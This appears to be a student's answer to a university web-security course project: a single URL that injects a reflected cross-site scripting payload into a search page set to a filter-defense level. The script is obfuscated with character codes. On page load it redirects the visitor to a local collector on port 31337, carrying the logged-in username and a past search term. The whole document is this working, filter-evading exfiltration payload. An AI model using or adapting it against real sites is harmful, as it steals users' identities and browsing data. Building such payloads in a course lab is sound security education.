https://project2.ecen4133.org/search?xssdefense=3&q=<script>window.addEventListener(String.fromCharCode(0x6c, 0x6f, 0x61, 0x64), function () {window.location.href = String.fromCharCode(0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x6C, 0x6F, 0x63, 0x61, 0x6C, 0x68, 0x6F, 0x73, 0x74, 0x3A, 0x33, 0x31, 0x33, 0x33, 0x37, 0x2F, 0x3F, 0x73, 0x74, 0x6F, 0x6C, 0x65, 0x6E, 0x5F, 0x75, 0x73, 0x65, 0x72, 0x3D).concat(document.getElementById(String.fromCharCode(0x6c, 0x6f, 0x67, 0x67, 0x65, 0x64, 0x2d, 0x69, 0x6e, 0x2d, 0x75, 0x73, 0x65, 0x72)).innerText, String.fromCharCode(0x26, 0x6C, 0x61, 0x73, 0x74, 0x5F, 0x73, 0x65, 0x61, 0x72, 0x63, 0x68, 0x3D), document.getElementsByClassName(String.fromCharCode(0x68, 0x69, 0x73, 0x74, 0x6F, 0x72, 0x79, 0x2D, 0x69, 0x74, 0x65, 0x6D, 0x20, 0x6C, 0x69, 0x73, 0x74, 0x2D, 0x67, 0x72, 0x6F, 0x75, 0x70, 0x2D, 0x69, 0x74, 0x65, 0x6D)).item(1).innerText)})</script>










